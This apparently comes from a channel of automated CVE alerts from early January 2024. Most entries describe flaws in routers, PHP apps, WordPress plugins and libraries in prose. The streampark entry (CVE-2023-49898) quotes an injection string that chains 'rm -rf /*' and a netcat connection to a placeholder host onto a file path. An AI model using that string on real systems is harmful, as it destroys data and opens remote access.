🚨 CVE-2024-0301A vulnerability classified as critical was found in fhs-opensource iparking 1.5.22.RELEASE. This vulnerability affects the function getData of the file src/main/java/com/xhb/pay/action/PayTempOrderAction.java. The manipulation leads to sql injection. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-249868.🎖@cveNotify |
|
| 2024-01-08 06:37:25 |
🚨 CVE-2024-0300A vulnerability was found in Beijing Baichuo Smart S150 Management Platform up to 20240101. It has been rated as critical. Affected by this issue is some unknown functionality of the file /useratte/userattestation.php of the component HTTP POST Request Handler. The manipulation of the argument web_img leads to unrestricted upload. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. VDB-249866 is the identifier assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.🎖@cveNotify |
|
| 2024-01-08 06:37:24 |
🚨 CVE-2024-0299A vulnerability was found in Totolink N200RE 9.3.5u.6139_B20201216. It has been declared as critical. Affected by this vulnerability is the function setTracerouteCfg of the file /cgi-bin/cstecgi.cgi. The manipulation of the argument command leads to os command injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-249865 was assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.🎖@cveNotify |
|
| 2024-01-08 05:37:25 |
🚨 CVE-2024-0297A vulnerability was found in Totolink N200RE 9.3.5u.6139_B20201216 and classified as critical. This issue affects the function UploadFirmwareFile of the file /cgi-bin/cstecgi.cgi. The manipulation of the argument FileName leads to os command injection. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-249863. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.🎖@cveNotify |
|
| 2024-01-08 04:37:25 |
🚨 CVE-2024-0296A vulnerability has been found in Totolink N200RE 9.3.5u.6139_B20201216 and classified as critical. This vulnerability affects the function NTPSyncWithHost of the file /cgi-bin/cstecgi.cgi. The manipulation of the argument host_time leads to os command injection. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. VDB-249862 is the identifier assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.🎖@cveNotify |
|
| 2024-01-08 04:37:24 |
🚨 CVE-2024-0295A vulnerability, which was classified as critical, was found in Totolink LR1200GB 9.1.0u.6619_B20230130. This affects the function setWanCfg of the file /cgi-bin/cstecgi.cgi. The manipulation of the argument hostName leads to os command injection. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-249861 was assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.🎖@cveNotify |
|
| 2024-01-08 03:37:30 |
🚨 CVE-2024-0293A vulnerability classified as critical was found in Totolink LR1200GB 9.1.0u.6619_B20230130. Affected by this vulnerability is the function setUploadSetting of the file /cgi-bin/cstecgi.cgi. The manipulation of the argument FileName leads to os command injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-249859. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.🎖@cveNotify |
|
| 2024-01-08 03:37:29 |
🚨 CVE-2023-47140IBM CICS Transaction Gateway 9.3 could allow a user to transfer or view files due to improper access controls. IBM X-Force ID: 270259.🎖@cveNotify |
|
| 2024-01-08 03:37:26 |
🚨 CVE-2023-7101Spreadsheet::ParseExcel version 0.65 is a Perl module used for parsing Excel files. Spreadsheet::ParseExcel is vulnerable to an arbitrary code execution (ACE) vulnerability due to passing unvalidated input from a file into a string-type “eval”. Specifically, the issue stems from the evaluation of Number format strings (not to be confused with printf-style format strings) within the Excel parsing logic.🎖@cveNotify |
|
| 2024-01-08 03:37:25 |
🚨 CVE-2023-49082aiohttp is an asynchronous HTTP client/server framework for asyncio and Python. Improper validation makes it possible for an attacker to modify the HTTP request (e.g. insert a new header) or even create a new HTTP request if the attacker controls the HTTP method. The vulnerability occurs only if the attacker can control the HTTP method (GET, POST etc.) of the request. If the attacker can control the HTTP version of the request it will be able to modify the request (request smuggling). This issue has been patched in version 3.9.0.🎖@cveNotify |
|
| 2024-01-08 03:37:24 |
🚨 CVE-2021-42260TinyXML through 2.6.2 has an infinite loop in TiXmlParsingData::Stamp in tinyxmlparser.cpp via the TIXML_UTF_LEAD_0 case. It can be triggered by a crafted XML message and leads to a denial of service.🎖@cveNotify |
|
| 2024-01-08 02:37:25 |
🚨 CVE-2023-50948IBM Storage Fusion HCI 2.1.0 through 2.6.1 contains hard-coded credentials, such as a password or cryptographic key, which it uses for its own inbound authentication, outbound communication to external components, or encryption of internal data. IBM X-Force ID: 275671.🎖@cveNotify |
|
| 2024-01-08 01:37:25 |
🚨 CVE-2024-0291A vulnerability was found in Totolink LR1200GB 9.1.0u.6619_B20230130. It has been rated as critical. This issue affects the function UploadFirmwareFile of the file /cgi-bin/cstecgi.cgi. The manipulation of the argument FileName leads to command injection. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-249857 was assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.🎖@cveNotify |
|
| 2024-01-08 01:37:24 |
🚨 CVE-2024-0290A vulnerability, which was classified as critical, has been found in Kashipara Food Management System 1.0. This issue affects some unknown processing of the file stock_edit.php. The manipulation of the argument item_type leads to sql injection. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-249851.🎖@cveNotify |
|
| 2024-01-08 00:37:25 |
🚨 CVE-2024-0289A vulnerability classified as critical was found in Kashipara Food Management System 1.0. This vulnerability affects unknown code of the file stock_entry_submit.php. The manipulation of the argument itemype leads to sql injection. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. VDB-249850 is the identifier assigned to this vulnerability.🎖@cveNotify |
|
| 2024-01-08 00:37:24 |
🚨 CVE-2024-0288A vulnerability classified as critical has been found in Kashipara Food Management System 1.0. This affects an unknown part of the file rawstock_used_damaged_submit.php. The manipulation of the argument product_name leads to sql injection. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-249849 was assigned to this vulnerability.🎖@cveNotify |
|
| 2024-01-07 23:37:24 |
🚨 CVE-2024-0287A vulnerability was found in Kashipara Food Management System 1.0. It has been rated as critical. Affected by this issue is some unknown functionality of the file itemBillPdf.php. The manipulation of the argument printid leads to sql injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-249848.🎖@cveNotify |
|
| 2024-01-07 20:37:24 |
🚨 CVE-2023-7214A vulnerability, which was classified as critical, has been found in Totolink N350RT 9.3.5u.6139_B20201216. Affected by this issue is the function main of the file /cgi-bin/cstecgi.cgi?action=login of the component HTTP POST Request Handler. The manipulation of the argument v8 leads to stack-based buffer overflow. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. VDB-249770 is the identifier assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.🎖@cveNotify |
|
| 2024-01-07 19:37:25 |
🚨 CVE-2023-7213A vulnerability classified as critical was found in Totolink N350RT 9.3.5u.6139_B20201216. Affected by this vulnerability is the function main of the file /cgi-bin/cstecgi.cgi?action=login&flag=1 of the component HTTP POST Request Handler. The manipulation of the argument v33 leads to stack-based buffer overflow. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-249769 was assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.🎖@cveNotify |
|
| 2024-01-07 19:37:24 |
🚨 CVE-2023-47145IBM Db2 for Windows (includes Db2 Connect Server) 10.5, 11.1, and 11.5 could allow a local user to escalate their privileges to the SYSTEM user using the MSI repair functionality. IBM X-Force ID: 270402.🎖@cveNotify |
|
| 2024-01-07 18:37:24 |
🚨 CVE-2024-0286A vulnerability, which was classified as problematic, was found in PHPGurukul Hospital Management System 1.0. This affects an unknown part of the file index.php#contact_us of the component Contact Form. The manipulation of the argument Name/Email/Message leads to cross site scripting. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-249843.🎖@cveNotify |
|
| 2024-01-07 17:37:25 |
🚨 CVE-2024-0284A vulnerability was found in Kashipara Food Management System up to 1.0. It has been rated as problematic. This issue affects some unknown processing of the file party_submit.php. The manipulation of the argument party_address leads to cross site scripting. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-249839.🎖@cveNotify |
|
| 2024-01-07 17:37:24 |
🚨 CVE-2023-7212A vulnerability classified as critical has been found in DeDeCMS up to 5.7.112. Affected is an unknown function of the file file_class.php of the component Backend. The manipulation leads to unrestricted upload. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-249768. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.🎖@cveNotify |
|
| 2024-01-07 16:37:25 |
🚨 CVE-2024-0283A vulnerability was found in Kashipara Food Management System up to 1.0. It has been declared as problematic. This vulnerability affects unknown code of the file party_details.php. The manipulation of the argument party_name leads to cross site scripting. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. VDB-249838 is the identifier assigned to this vulnerability.🎖@cveNotify |
|
| 2024-01-07 16:37:24 |
🚨 CVE-2024-0282A vulnerability was found in Kashipara Food Management System up to 1.0. It has been classified as problematic. This affects an unknown part of the file addmaterialsubmit.php. The manipulation of the argument tin leads to cross site scripting. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-249837 was assigned to this vulnerability.🎖@cveNotify |
|
| 2024-01-07 15:37:25 |
🚨 CVE-2024-0281A vulnerability was found in Kashipara Food Management System up to 1.0 and classified as critical. Affected by this issue is some unknown functionality of the file loginCheck.php. The manipulation of the argument password leads to sql injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-249836.🎖@cveNotify |
|
| 2024-01-07 15:37:24 |
🚨 CVE-2024-0280A vulnerability has been found in Kashipara Food Management System up to 1.0 and classified as critical. Affected by this vulnerability is an unknown functionality of the file item_type_submit.php. The manipulation of the argument type_name leads to sql injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-249835.🎖@cveNotify |
|
| 2024-01-07 14:37:25 |
🚨 CVE-2024-0279A vulnerability, which was classified as critical, was found in Kashipara Food Management System up to 1.0. Affected is an unknown function of the file item_list_edit.php. The manipulation of the argument id leads to sql injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. VDB-249834 is the identifier assigned to this vulnerability.🎖@cveNotify |
|
| 2024-01-07 14:37:24 |
🚨 CVE-2024-0278A vulnerability, which was classified as critical, has been found in Kashipara Food Management System up to 1.0. This issue affects some unknown processing of the file partylist_edit_submit.php. The manipulation of the argument id leads to sql injection. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-249833 was assigned to this vulnerability.🎖@cveNotify |
|
| 2024-01-07 13:37:25 |
🚨 CVE-2024-0277A vulnerability classified as critical was found in Kashipara Food Management System up to 1.0. This vulnerability affects unknown code of the file party_submit.php. The manipulation of the argument party_name leads to sql injection. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-249832.🎖@cveNotify |
|
| 2024-01-07 13:37:24 |
🚨 CVE-2024-0276A vulnerability classified as critical has been found in Kashipara Food Management System up to 1.0. This affects an unknown part of the file rawstock_used_damaged_smt.php. The manipulation of the argument product_name leads to sql injection. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-249831.🎖@cveNotify |
|
| 2024-01-07 12:37:24 |
🚨 CVE-2024-0274A vulnerability was found in Kashipara Food Management System up to 1.0. It has been declared as critical. Affected by this vulnerability is an unknown functionality of the file billAjax.php. The manipulation of the argument item_name leads to sql injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-249829 was assigned to this vulnerability.🎖@cveNotify |
|
| 2024-01-07 11:37:31 |
🚨 CVE-2022-41704A vulnerability in Batik of Apache XML Graphics allows an attacker to run untrusted Java code from an SVG. This issue affects Apache XML Graphics prior to 1.16. It is recommended to update to version 1.16.🎖@cveNotify |
|
| 2024-01-07 11:37:30 |
🚨 CVE-2022-40146Server-Side Request Forgery (SSRF) vulnerability in Batik of Apache XML Graphics allows an attacker to access files using a Jar url. This issue affects Apache XML Graphics Batik 1.14.🎖@cveNotify |
|
| 2024-01-07 11:37:26 |
🚨 CVE-2022-38398Server-Side Request Forgery (SSRF) vulnerability in Batik of Apache XML Graphics allows an attacker to load a url thru the jar protocol. This issue affects Apache XML Graphics Batik 1.14.🎖@cveNotify |
|
| 2024-01-07 11:37:25 |
🚨 CVE-2018-8013In Apache Batik 1.x before 1.10, when deserializing subclass of `AbstractDocument`, the class takes a string from the inputStream as the class name which then use it to call the no-arg constructor of the class. Fix was to check the class type before calling newInstance in deserialization.🎖@cveNotify |
|
| 2024-01-07 10:37:26 |
🚨 CVE-2023-7210A vulnerability was found in OneNav up to 0.9.33. It has been classified as critical. This affects an unknown part of the file /index.php?c=api of the component API. The manipulation of the argument X-Token leads to improper authentication. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-249765 was assigned to this vulnerability.🎖@cveNotify |
|
| 2024-01-07 10:37:25 |
🚨 CVE-2023-0809In Mosquitto before 2.0.16, excessive memory is allocated based on malicious initial packets that are not CONNECT packets.🎖@cveNotify |
|
| 2024-01-07 10:37:24 |
🚨 CVE-2023-28366The broker in Eclipse Mosquitto 1.3.2 through 2.x before 2.0.16 has a memory leak that can be abused remotely when a client sends many QoS 2 messages with duplicate message IDs, and fails to respond to PUBREC commands. This occurs because of mishandling of EAGAIN from the libc send function.🎖@cveNotify |
|
| 2024-01-07 09:37:32 |
🚨 CVE-2024-0271A vulnerability has been found in Kashipara Food Management System up to 1.0 and classified as critical. This vulnerability affects unknown code of the file addmaterial_edit.php. The manipulation of the argument id leads to sql injection. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. VDB-249826 is the identifier assigned to this vulnerability.🎖@cveNotify |
|
| 2024-01-07 09:37:26 |
🚨 CVE-2023-7209A vulnerability was found in Uniway Router up to 2.0. It has been rated as critical. Affected by this issue is some unknown functionality of the file /boaform/device_reset.cgi of the component Device Reset Handler. The manipulation leads to denial of service. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. VDB-249758 is the identifier assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.🎖@cveNotify |
|
| 2024-01-07 09:37:25 |
🚨 CVE-2022-0563A flaw was found in the util-linux chfn and chsh utilities when compiled with Readline support. The Readline library uses an "INPUTRC" environment variable to get a path to the library config file. When the library cannot parse the specified file, it prints an error message containing data from the file. This flaw allows an unprivileged user to read root-owned files, potentially leading to privilege escalation. This flaw affects util-linux versions prior to 2.37.4.🎖@cveNotify |
|
| 2024-01-07 09:37:24 |
🚨 CVE-2021-37600An integer overflow in util-linux through 2.37.1 can potentially cause a buffer overflow if an attacker were able to use system resources in a way that leads to a large number in the /proc/sysvipc/sem file. NOTE: this is unexploitable in GNU C Library environments, and possibly in all realistic environments.🎖@cveNotify |
|
| 2024-01-07 08:37:25 |
🚨 CVE-2024-0268A vulnerability, which was classified as critical, has been found in Kashipara Hospital Management System up to 1.0. Affected by this issue is some unknown functionality of the file registration.php. The manipulation of the argument name/email/pass/gender/age/city leads to sql injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-249824.🎖@cveNotify |
|
| 2024-01-07 07:37:24 |
🚨 CVE-2023-7208A vulnerability classified as critical was found in Totolink X2000R_V2 2.0.0-B20230727.10434. This vulnerability affects the function formTmultiAP of the file /bin/boa. The manipulation leads to buffer overflow. VDB-249742 is the identifier assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.🎖@cveNotify |
|
| 2024-01-07 06:37:24 |
🚨 CVE-2024-0266A vulnerability classified as problematic has been found in Project Worlds Online Lawyer Management System 1.0. Affected is an unknown function of the component User Registration. The manipulation of the argument First Name leads to cross site scripting. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. VDB-249822 is the identifier assigned to this vulnerability.🎖@cveNotify |
|
| 2024-01-07 05:37:25 |
🚨 CVE-2024-0265A vulnerability was found in SourceCodester Clinic Queuing System 1.0. It has been rated as critical. This issue affects some unknown processing of the file /index.php of the component GET Parameter Handler. The manipulation of the argument page leads to file inclusion. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-249821 was assigned to this vulnerability.🎖@cveNotify |
|
| 2024-01-07 05:37:24 |
🚨 CVE-2024-0264A vulnerability was found in SourceCodester Clinic Queuing System 1.0. It has been declared as critical. This vulnerability affects unknown code of the file /LoginRegistration.php. The manipulation of the argument formToken leads to authorization bypass. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-249820.🎖@cveNotify |
|
| 2024-01-07 04:37:25 |
🚨 CVE-2024-0263A vulnerability was found in ACME Ultra Mini HTTPd 1.21. It has been classified as problematic. This affects an unknown part of the component HTTP GET Request Handler. The manipulation leads to denial of service. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. It is recommended to apply a patch to fix this issue. The associated identifier of this vulnerability is VDB-249819.🎖@cveNotify |
|
| 2024-01-07 02:37:32 |
🚨 CVE-2024-0225Use after free in WebGPU in Google Chrome prior to 120.0.6099.199 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. (Chromium security severity: High)🎖@cveNotify |
|
| 2024-01-07 02:37:25 |
🚨 CVE-2023-7104A vulnerability was found in SQLite SQLite3 up to 3.43.0 and classified as critical. This issue affects the function sessionReadRecord of the file ext/session/sqlite3session.c of the component make alltest Handler. The manipulation leads to heap-based buffer overflow. It is recommended to apply a patch to fix this issue. The associated identifier of this vulnerability is VDB-248999.🎖@cveNotify |
|
| 2024-01-07 02:37:24 |
🚨 CVE-2023-6879Increasing the resolution of video frames, while performing a multi-threaded encode, can result in a heap overflow in av1_loop_restoration_dealloc().🎖@cveNotify |
|
| 2024-01-07 00:37:24 |
🚨 CVE-2024-0260A vulnerability, which was classified as problematic, was found in SourceCodester Engineers Online Portal 1.0. Affected is an unknown function of the file change_password_teacher.php of the component Password Change. The manipulation leads to session expiration. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-249816.🎖@cveNotify |
|
| 2024-01-06 12:37:24 |
🚨 CVE-2023-51441** UNSUPPORTED WHEN ASSIGNED ** Improper Input Validation vulnerability in Apache Axis allowed users with access to the admin service to perform possible SSRFThis issue affects Apache Axis: through 1.3.As Axis 1 has been EOL we recommend you migrate to a different SOAP engine, such as Apache Axis 2/Java. Alternatively you could use a build of Axis with the patch from https://github.com/apache/axis-axis1-java/commit/685c309febc64aa393b2d64a05f90e7eb9f73e06 applied. The Apache Axis project does not expect to create an Axis 1.x release fixing this problem, though contributors that would like to work towards this are welcome.🎖@cveNotify |
|
| 2024-01-06 10:37:25 |
🚨 CVE-2023-6798The RSS Aggregator by Feedzy – Feed to Post, Autoblogging, News & YouTube Video Feeds Aggregator plugin for WordPress is vulnerable to unauthorized settings update due to a missing capability check when updating settings in all versions up to, and including, 4.3.2. This makes it possible for authenticated attackers, with author-level access or above to change the plugin's settings including proxy settings, which are also exposed to authors.🎖@cveNotify |
|
| 2024-01-06 10:37:24 |
🚨 CVE-2020-27637The R programming language’s default package manager CRAN is affected by a path traversal vulnerability that can lead to server compromise. This vulnerability affects packages installed via the R CMD install cli command or the install.packages() function from the interpreter. Update to version 4.0.3🎖@cveNotify |
|
| 2024-01-06 05:37:25 |
🚨 CVE-2023-50121Autel EVO NANO drone flight control firmware version 1.6.5 is vulnerable to denial of service (DoS).🎖@cveNotify |
|
| 2024-01-06 05:37:24 |
🚨 CVE-2023-46953SQL Injection vulnerability in ABO.CMS v.5.9.3, allows remote attackers to execute arbitrary code via the d parameter in the Documents module.🎖@cveNotify |
|
| 2024-01-06 04:37:25 |
🚨 CVE-2023-39853SQL Injection vulnerability in Dzzoffice version 2.01, allows remote attackers to obtain sensitive information via the doobj and doevent parameters in the Network Disk backend module.🎖@cveNotify |
|
| 2024-01-06 03:37:24 |
🚨 CVE-2023-50612Insecure Permissions vulnerability in fit2cloud Cloud Explorer Lite version 1.4.1, allow local attackers to escalate privileges and obtain sensitive information via the cloud accounts parameter.🎖@cveNotify |
|
| 2024-01-06 00:07:25 |
🚨 CVE-2023-49551An issue in Cesanta mjs 2.20.0 allows a remote attacker to cause a denial of service via the mjs_op_json_parse function in the msj.c file.🎖@cveNotify |
|
| 2024-01-06 00:07:24 |
🚨 CVE-2023-4468A vulnerability was found in Poly Trio 8800 and Trio C60. It has been classified as problematic. This affects an unknown part of the component Poly Lens Management Cloud Registration. The manipulation leads to missing authorization. It is possible to launch the attack on the physical device. The exploit has been disclosed to the public and may be used. The identifier VDB-249261 was assigned to this vulnerability.🎖@cveNotify |
|
| 2024-01-05 23:07:24 |
🚨 CVE-2023-52269MDaemon SecurityGateway through 9.0.3 allows XSS via a crafted Message Content Filtering rule. This might allow domain administrators to conduct attacks against global administrators.🎖@cveNotify |
|
| 2024-01-05 22:37:32 |
🚨 CVE-2023-7187A vulnerability was found in Totolink N350RT 9.3.5u.6139_B20201216. It has been rated as critical. This issue affects some unknown processing of the file /cgi-bin/cstecgi.cgi?action=login&flag=ie8 of the component HTTP POST Request Handler. The manipulation leads to stack-based buffer overflow. The exploit has been disclosed to the public and may be used. The identifier VDB-249389 was assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.🎖@cveNotify |
|
| 2024-01-05 22:37:25 |
🚨 CVE-2023-7183A vulnerability has been found in 7-card Fakabao up to 1.0_build20230805 and classified as critical. Affected by this vulnerability is an unknown functionality of the file shop/alipay_notify.php. The manipulation of the argument out_trade_no leads to sql injection. The exploit has been disclosed to the public and may be used. The identifier VDB-249385 was assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.🎖@cveNotify |
|
| 2024-01-05 22:37:24 |
🚨 CVE-2023-4463A vulnerability classified as problematic was found in Poly CCX 400, CCX 600, Trio 8800 and Trio C60. This vulnerability affects unknown code of the component HTTP Header Handler. The manipulation of the argument Cookie leads to denial of service. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-249256.🎖@cveNotify |
|
| 2024-01-05 22:07:31 |
🚨 CVE-2023-49135in OpenHarmony v3.2.2 and prior versions allow a local attacker cause multimedia player crash through modify a released pointer.🎖@cveNotify |
|
| 2024-01-05 22:07:30 |
🚨 CVE-2023-47857in OpenHarmony v3.2.2 and prior versions allow a local attacker cause multimedia camera crash through modify a released pointer.🎖@cveNotify |
|
| 2024-01-05 22:07:26 |
🚨 CVE-2023-52182Deserialization of Untrusted Data vulnerability in ARI Soft ARI Stream Quiz – WordPress Quizzes Builder.This issue affects ARI Stream Quiz – WordPress Quizzes Builder: from n/a through 1.3.0.🎖@cveNotify |
|
| 2024-01-05 22:07:25 |
🚨 CVE-2023-52286Tencent tdsqlpcloud through 1.8.5 allows unauthenticated remote attackers to discover database credentials via an index.php/api/install/get_db_info request, a related issue to CVE-2023-42387.🎖@cveNotify |
|
| 2024-01-05 21:37:24 |
🚨 CVE-2024-21641Flarum is open source discussion platform software. Prior to version 1.8.5, the Flarum `/logout` route includes a redirect parameter that allows any third party to redirect users from a (trusted) domain of the Flarum installation to redirect to any link. For logged-in users, the logout must be confirmed. Guests are immediately redirected. This could be used by spammers to redirect to a web address using a trusted domain of a running Flarum installation. The vulnerability has been fixed and published as flarum/core v1.8.5. As a workaround, some extensions modifying the logout route can remedy this issue if their implementation is safe.🎖@cveNotify |
|
| 2024-01-05 21:07:30 |
🚨 CVE-2023-52133Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in WhileTrue Most And Least Read Posts Widget.This issue affects Most And Least Read Posts Widget: from n/a through 2.5.16.🎖@cveNotify |
|
| 2024-01-05 21:07:25 |
🚨 CVE-2023-51547Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in WPManageNinja LLC Fluent Support – WordPress Helpdesk and Customer Support Ticket Plugin.This issue affects Fluent Support – WordPress Helpdesk and Customer Support Ticket Plugin: from n/a through 1.7.6.🎖@cveNotify |
|
| 2024-01-05 21:07:24 |
🚨 CVE-2023-52264The beesblog (aka Bees Blog) component before 1.6.2 for thirty bees allows Reflected XSS because controllers/front/post.php sharing_url is mishandled.🎖@cveNotify |
|
| 2024-01-05 20:07:32 |
🚨 CVE-2023-50070Sourcecodester Customer Support System 1.0 has multiple SQL injection vulnerabilities in /customer_support/ajax.php?action=save_ticket via department_id, customer_id, and subject.🎖@cveNotify |
|
| 2024-01-05 20:07:26 |
🚨 CVE-2023-50892Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in CodexThemes TheGem - Creative Multi-Purpose & WooCommerce WordPress Theme allows Reflected XSS.This issue affects TheGem - Creative Multi-Purpose & WooCommerce WordPress Theme: from n/a through 5.9.1.🎖@cveNotify |
|
| 2024-01-05 20:07:25 |
🚨 CVE-2023-49898In streampark, there is a project module that integrates Maven's compilation capability. However, there is no check on the compilation parameters of Maven. allowing attackers to insert commands for remote command execution, The prerequisite for a successful attack is that the user needs to log in to the streampark system and have system-level permissions. Generally, only users of that system have the authorization to log in, and users would not manually input a dangerous operation command. Therefore, the risk level of this vulnerability is very low.Mitigation:all users should upgrade to 2.1.2Example:##You can customize the splicing method according to the compilation situation of the project, mvn compilation results use &&, compilation failure use "||" or "&&":/usr/share/java/maven-3/conf/settings.xml || rm -rf /*/usr/share/java/maven-3/conf/settings.xml && nohup nc x.x.x.x 8899 &🎖@cveNotify |
|
| 2024-01-05 20:07:24 |
🚨 CVE-2023-6837Multiple WSO2 products have been identified as vulnerable to perform user impersonatoin using JIT provisioning. In order for this vulnerability to have any impact on your deployment, following conditions must be met: * An IDP configured for federated authentication and JIT provisioning enabled with the "Prompt for username, password and consent" option. * A service provider that uses the above IDP for federated authentication and has the "Assert identity using mapped local subject identifier" flag enabled.Attacker should have: * A fresh valid user account in the federated IDP that has not been used earlier. * Knowledge of the username of a valid user in the local IDP.When all preconditions are met, a malicious actor could use JIT provisioning flow to perform user impersonation.🎖@cveNotify |
|
| 2024-01-05 19:37:25 |
🚨 CVE-2023-23576Incorrect behavior order in the Command Centre Server could allow privileged users to gain physical access to the site for longer than intended after a network outage when competencies are used in the access decision. This issue affects: Gallagher Command Centre: 8.90 prior to vEL8.90.1620 (MR2), 8.80 prior to vEL8.80.1369 (MR3), 8.70 prior to vEL8.70.2375 (MR5), 8.60 prior to vEL8.60.2550 (MR7), all versions of 8.50 and prior.🎖@cveNotify |
|
| 2024-01-05 19:07:34 |
🚨 CVE-2023-7180A vulnerability has been found in Tongda OA 2017 up to 11.9 and classified as critical. Affected by this vulnerability is an unknown functionality of the file general/project/proj/delete.php. The manipulation of the argument PROJ_ID_STR leads to sql injection. The exploit has been disclosed to the public and may be used. Upgrading to version 11.10 is able to address this issue. It is recommended to upgrade the affected component. The associated identifier of this vulnerability is VDB-249367. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.🎖@cveNotify |
|
| 2024-01-05 19:07:28 |
🚨 CVE-2022-46487Improper initialization of x87 and SSE floating-point configuration registers in the __scone_entry component of SCONE before 5.8.0 for Intel SGX allows a local attacker to compromise the execution integrity of floating-point operations in an enclave or access sensitive information via side-channel analysis.🎖@cveNotify |
|
| 2024-01-05 19:07:27 |
🚨 CVE-2020-17163Visual Studio Code Python Extension Remote Code Execution Vulnerability🎖@cveNotify |
|
| 2024-01-05 19:07:26 |
🚨 CVE-2023-50891Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Zoho Forms Form plugin for WordPress – Zoho Forms allows Stored XSS.This issue affects Form plugin for WordPress – Zoho Forms: from n/a through 3.0.1.🎖@cveNotify |
|
| 2024-01-05 18:37:44 |
🚨 CVE-2023-51676Server-Side Request Forgery (SSRF) vulnerability in Leevio Happy Addons for Elementor.This issue affects Happy Addons for Elementor: from n/a through 3.9.1.1.🎖@cveNotify |
|
| 2024-01-05 18:37:43 |
🚨 CVE-2023-7078Sending specially crafted HTTP requests to Miniflare's server could result in arbitrary HTTP and WebSocket requests being sent from the server. If Miniflare was configured to listen on external network interfaces (as was the default in wrangler until 3.19.0), an attacker on the local network could access other local servers.🎖@cveNotify |
|
| 2024-01-05 18:37:42 |
🚨 CVE-2023-51402Cross-Site Request Forgery (CSRF) vulnerability in Brain Storm Force Ultimate Addons for WPBakery Page Builder.This issue affects Ultimate Addons for WPBakery Page Builder: from n/a through 3.19.17.🎖@cveNotify |
|
| 2024-01-05 18:37:38 |
🚨 CVE-2023-51420Improper Control of Generation of Code ('Code Injection') vulnerability in Soft8Soft LLC Verge3D Publishing and E-Commerce.This issue affects Verge3D Publishing and E-Commerce: from n/a through 4.5.2.🎖@cveNotify |
|
| 2024-01-05 18:37:37 |
🚨 CVE-2023-7093A vulnerability classified as critical has been found in KylinSoft kylin-system-updater up to 2.0.5.16-0k2.33. Affected is an unknown function of the file /usr/share/kylin-system-updater/SystemUpdater/UpgradeStrategiesDbus.py of the component com.kylin.systemupgrade Service. The manipulation of the argument SetDownloadspeedMax leads to os command injection. The attack needs to be approached locally. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-248940. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.🎖@cveNotify |
|
| 2024-01-05 18:37:32 |
